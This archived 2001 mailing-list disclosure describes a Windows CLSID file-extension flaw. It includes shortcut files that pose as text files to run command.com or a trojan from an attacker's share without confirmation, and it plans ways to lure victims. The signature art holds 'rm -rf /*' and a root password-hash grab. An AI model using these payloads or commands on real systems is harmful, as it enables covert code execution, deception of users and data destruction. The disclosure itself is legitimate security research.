-----BEGIN PGP SIGNED MESSAGE-----
There is a possibility to run program(e.g. trojan)
without confirmation and even without a suspicion...
Exploring registry I've found 2 interesting
CLSID's:
the first one is CLSID of .lnk file
.lnk file: {00021401-0000-0000-C000-000000000046}
I wouldn't stop on this 'cause it's binary
file and if you have certain utils, U can try
to find smth. useful out of this.
I found much more easier way to use CLSID bug,
and here it is, CLSID of .url file...
.url file: {FBF23B40-E3F0-101B-8488-00AA003E56F8}
If someone create file, e.g.
==== CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
[InternetShortcut]
URL=file://c:/command.com
========================= END OF FILE =========================
Double-click on this file in explorer will cause launching
MS-DOS Prompt. But... in explorer that file will have
icon of .url file.
There is a way to fix it. And it can be done adding some
lines to the file. Now the file looks like this:
==== CreditCard.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
[InternetShortcut]
URL=file://c:/command.com
IconIndex=-152
IconFile=shell32.dll
========================= END OF FILE =========================
Now the file in explorer will be visible with normal
.txt-file icon (you can change IconIndex and/or IconFile
for other icon), and when someone clicks on it he thinks
that's normal text file, but as the result of double-clicking
MS-DOS Prompt will pop-up, without any confirmations(!!!).
But that's not all... If hacker is on the same network with
possible victim (or he has an access to the computer on
victim's network), there is possibility to run the hacker's
program directly from the network. For this purpose
he can use the following file
==== master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8} ====
[InternetShortcut]
URL=file://ourcomp/ourshare/path/to/trojan.exe
IconIndex=-152
IconFile=shell32.dll
=========================== END OF FILE ==========================
Where ourcomp is the name of hacker's computer on the victim's
network, ourshare is the name of shared folder on that computer,
and as U can guess path/to is path to trojan.exe on that share.
And after double-clicking guess what MS Explorer will do ???
CORRECT !!! It'll run trojan.exe WITHOUT ANY CONFIRMATIONS !!!!
Now if hacker will be so smart to write trojan-program that will do
some crazy things and create a file master.passwd.txt (without CLSID)
on victim's computer and open it with notepad, victim won't even have
a suspicion of the trick ;-)
Tested on Win98, IE5.0
I don't know how IE would behave if that file will be accessed
from <a href="...">, but I tried it on localhost this way:
in IE location bar I've typed
"file://X:/XPL/CLSID/master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA00
E56F8}",
and... IE executed trojan.exe ;-). From <a href="..."> it didn't
work.
WORKAROUND
1. View file properties before opening any innocent-looking files in
explorer
(not realistic)
2. Remove from registry all CLSIDs of .url and .lnk, but this may
cause system
to work improperly.
3. Do not use explorer to open files. You can use Far Manager,
Windows Commander, etc as I do.
> Yet while valid the vulnerabilities are not particularly
> threatening. For the vulnerability to be exploited an attacker must
> somehow place a file somewhere the user is likely to find it and
> somehow entice him to "open" it by clicking on it.
That's why an attacker should name files
master.passwd.txt.{FBF23B40-E3F0-101B-8488-00AA003E56F8},
or tsomething like that. But there is even more dangerous way,
we can name our file
passwords.{FBF23B40-E3F0-101B-8488-00AA003E56F8}
and change it's icon to the icon of Folder, so the victim
would think, she's opening Folder.
If we place the file on out shared folder, and then somehow
invite the victim to that share (e.g. to download Document.doc).
If the victim is curious, she'll notice folder "passwords",
and would go to see the passwords ;-)
Here are some scenarios by Elias Levy(aka Aleph One):
> I can think of a couple of scenarios were this may be possible. The
> most appealing is one were an attacker has obtained access to a
> file server used by the user and places a malicious file in the
> share. If the user finds the file and opens it the attack can
> leverage his acess to the file server into access to the victims
> machine.
>
> Another scenario may be to use some vulnerability that allows an
> attacker to create, but not execute or overwrite other files, in a
> victims machine. He can place the file on the vicstims machine via
> the vulnerability but must wait for him to open the file.
>
> Another scenario may transfer the file into a victims machine via a
> email message. The attacker may be able to fool the mail client not
> to display the full file name of the file, which the victim then
> saves, and opens. Maybe we can use the trick of padding the file
> name with spaces between the "txt" and ".{..." parts so that the
> filename is truncated when displayed to the user.
And here are some scenarios by me:
If I know the victim(I mean, that I know her e-mail, and I've got at
least
one letter from the victim), then I can check X-Mailer in the headers
of victim's letters. Now, if I'm sure, that victim uses The Bat!,
then I use this scenario:
I send e-mail to the victim with attached trojan.exe.
Completely clear, that victim will delete that message, but...
that file(trojan.exe) will remain on victim's computer until
the message will be deleted from Trash-folder. And all attachments
of this type(non-text) are stored in the following folder on
victim's
machine: C:\Program Files\The Bat!\Mail\Victim's Name\Attach\
So, now I can use file with CLSID-extension to run program
C:\Program Files\The Bat!\Mail\Victim's Name\Attach\trojan.exe
on victim's machine.
If the victim uses Outlook Express, you cn use aleph1's trick with
spaces between the second extension. But... Outlook will
show:
1. Icon of file as Internet Shortcut
2. all spaces and CLSID extension when victim will try to open it.
The other trick is to place spaces before the entire name of file,
in my case the file was named big2.txt.{...CLSID...}, and I've
placed 58 spaces, so Outlook showed it like "big2.txt...".
I don't think this is the usage of CLSID bug, 'cause this way
we can send any .exe file, etc...
By the way, if there will be a lot of spaces before the name of file,
explorer begins to do some crazy things:
1. It doesn't show the name of file(spaces)
2. After selecting the file and switching from explorer - to
explorer,
it shows the name of file e.g. master.passwd.txt)not in the
selected region, but nearly 30 pixels lower. And then when
you drag that file, the name will remain on the same place ;-))
I'll try to find out some tricks with .lnk CLSID, so bye for now...
EnJoY !
with Best regards,
[Co]Proc,
procat_private
brought 2 U by [HtR]team, teamat_private:
EforeZZ - eforezzat_private, The LNU, Lviv, Ukraine
[Co]Proc - procat_private, The KPI, Kiev, Ukraine
........................
....:::::[ hAck tHe rEaLitY ]:::::....
...::::::::::::::::::::::::::::::::::::::::::::...
_____ __.-- - - [HtR] team - - --.__ _______
_ \___/..::::::::::::::::::::::::::::::::..\___/ _
_____/ \____ the reality can be hacked ____/ \_______
\__ the trouble is to __/
\__ find out HOW? __/
\______________/
________________/ \____________________
|$ ./a.out -x 20 | | [HtR]team |
|# rm -rf /* || | teamat_private ||
|________________|| | [Co]Proc ||
----------------+ | coprocat_private ||
| EforeZZ ||
| EforeZZat_private ||
|____________________||
--------------------+
[ 25 packets sent, 0 packets received, 100% packet loss ]
# grep root /etc/master.passwd|cut -d: -f2|write root
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5i
iQEVAwUBOuZeevKsruSZV1VvAQH5/Qf/YmS/uNrJbfJxPbxAvkMSSq+sy216D8s5
Uf9A6Dh9RrPjQJw8/hXqwhM/2ZsdtE0R87LhtRr0DBd+4WHoQfK/lXdp++VcBU6N
x6GKfnYf+vsn8Ei+0YbXqm+oMC7axaYDf2+UI84zUw/uyJ+kKxOrn8ekUKhK/Rvq
UMOPMYG2qGKyqY/Ue/fDjkH4PcbF9di4a1KlPstn4+7f9tr2YHGkXOJeLnM2cIPF
MqwSt3BzrzuvF4CB/f2lmRF7T7+bh4f3arXEyNudDLdOYuQlOHOLuTHIYRq4oG0z
PJnSX/rPQNVo3dmjvgoQu9hXWit6lOedriAsi3sK55eNiBPgLsOQCg==
=q/Sq
-----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Wed Apr 25 2001 - 19:02:28 PDT